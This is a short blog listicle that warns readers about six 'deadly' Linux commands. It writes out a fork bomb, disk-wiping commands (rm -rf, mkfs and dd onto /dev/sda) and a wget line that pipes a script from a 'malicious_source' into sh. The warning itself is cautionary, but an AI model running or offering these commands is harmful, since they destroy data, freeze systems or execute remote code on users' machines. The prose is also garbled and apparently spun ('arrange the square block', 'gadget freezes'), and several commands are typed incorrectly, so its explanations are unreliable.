6 Most Deadly Linux Commands Hacker’s and Pentester’s Use All The Time

by Ultron
1163 views

Just like on Windows, Linux also has masses of terminal commands to carry out different operations. However, unlike Windows, Linux won’t ask you for confirmation in case you run any command that could damage your system. So, we suggest you to not use these the following commands at any cost while using Linux.

Hackers Use these commands mostly depending on the purpose.

1] rm -rf

The rm -rf command is one of the fastest approaches to delete a folder and its contents. But touch typing mistakes or lack of expertise can bring about unrecoverable damage to the system. Some of the options used with the rm command are like Rm -r command deletes the folder recursively, even the empty folder. Rm -f only read the file ‘without asking the file. It additionally has the power to take away all files present in the root directory.

2] : () {: |: &} ;:

The above command is the literally a bomb. It operates via defining a function call, which is call itself again twice, once within the foreground and once in the background. It keeps looping again and again till the gadget freezes.

3] Wget http: // malicious_source -O|

sh down load a script from a malicious source after which run it on your system, The Wget command will download the script and sh command right after that will run the downloaded script on your machine.

4] ^ foo ^ bar

This command is used to edit the previous command which was executed before without the need to retype the whole command again. But it is able to be surely problematic in case you do not take the chance to carefully test the change inside the unique command using ^ ^ foo bar command.

5] Mkfs.ext3 / dev / sda

The above command will basically arrange the square block ‘sda’ and you will realize that subsequent to running the above direction your Block (Hard Disk Drive) will be reset to NEW! Without the information, leaving the framework in the unrecoverable stage.

6] dd if = / dev / random of = / dev / sda

The above command direction will end as/dev/sda and compose random information for the block of memory. Obviously! Your computer would be left in a conflicting and unrecoverable stage.

You may also like

Leave a Reply